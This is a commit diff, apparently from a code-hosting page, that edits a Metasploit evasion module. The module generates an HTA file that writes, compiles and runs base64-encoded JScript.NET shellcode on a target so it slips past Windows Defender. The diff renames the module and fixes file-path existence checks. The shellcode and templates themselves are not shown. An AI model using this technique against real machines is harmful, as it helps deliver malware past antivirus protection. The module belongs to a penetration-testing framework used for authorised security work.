Rename file
parent
c7efd57144
commit
a25a7086b2
|
@ -7,7 +7,7 @@ class MetasploitModule < Msf::Evasion
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(merge_info(info,
|
super(merge_info(info,
|
||||||
'Name' => 'Microsoft Windows Defender Evasive HTA',
|
'Name' => 'Microsoft Windows Defender Evasive JS.Net and HTA',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module will generate an HTA file that writes and compiles a JScript.NET file
|
This module will generate an HTA file that writes and compiles a JScript.NET file
|
||||||
containing shellcode on the target machine. After compilation, the generated EXE will
|
containing shellcode on the target machine. After compilation, the generated EXE will
|
||||||
|
@ -38,17 +38,16 @@ class MetasploitModule < Msf::Evasion
|
||||||
def run
|
def run
|
||||||
# This is used in the ERB template
|
# This is used in the ERB template
|
||||||
file_payload = Rex::Text.encode_base64(payload.encoded)
|
file_payload = Rex::Text.encode_base64(payload.encoded)
|
||||||
|
evasion_shellcode_path = File.join(Msf::Config.data_directory, 'exploits', 'evasion_shellcode.js')
|
||||||
jsnet_code = File.read(File.join(Msf::Config.data_directory, 'exploits', 'evasion_shellcode.js'))
|
jsnet_code = File.read(evasion_shellcode_path)
|
||||||
fail_with(Failure::NotFound, 'The JScript.NET file was not found.') unless File.exists?(jsnet_code)
|
fail_with(Failure::NotFound, 'The JScript.NET file was not found.') unless File.exists?(evasion_shellcode_path)
|
||||||
js_file = ERB.new(jsnet_code).result(binding())
|
js_file = ERB.new(jsnet_code).result(binding())
|
||||||
jsnet_encoded = Rex::Text.encode_base64(js_file)
|
jsnet_encoded = Rex::Text.encode_base64(js_file)
|
||||||
|
|
||||||
# This is used in the ERB template
|
# This is used in the ERB template
|
||||||
fname = Rex::Text.rand_text_alpha(6)
|
fname = Rex::Text.rand_text_alpha(6)
|
||||||
|
hta_path = File.join(Msf::Config.data_directory, 'exploits', 'hta_evasion.hta')
|
||||||
hta = File.read(File.join(Msf::Config.data_directory, 'exploits', 'hta_evasion.hta'))
|
hta = File.read(hta_path)
|
||||||
fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exists?(hta)
|
fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exists?(hta_path)
|
||||||
hta_file = ERB.new(hta).result(binding())
|
hta_file = ERB.new(hta).result(binding())
|
||||||
|
|
||||||
file_create(hta_file)
|
file_create(hta_file)
|
Loading…
Reference in New Issue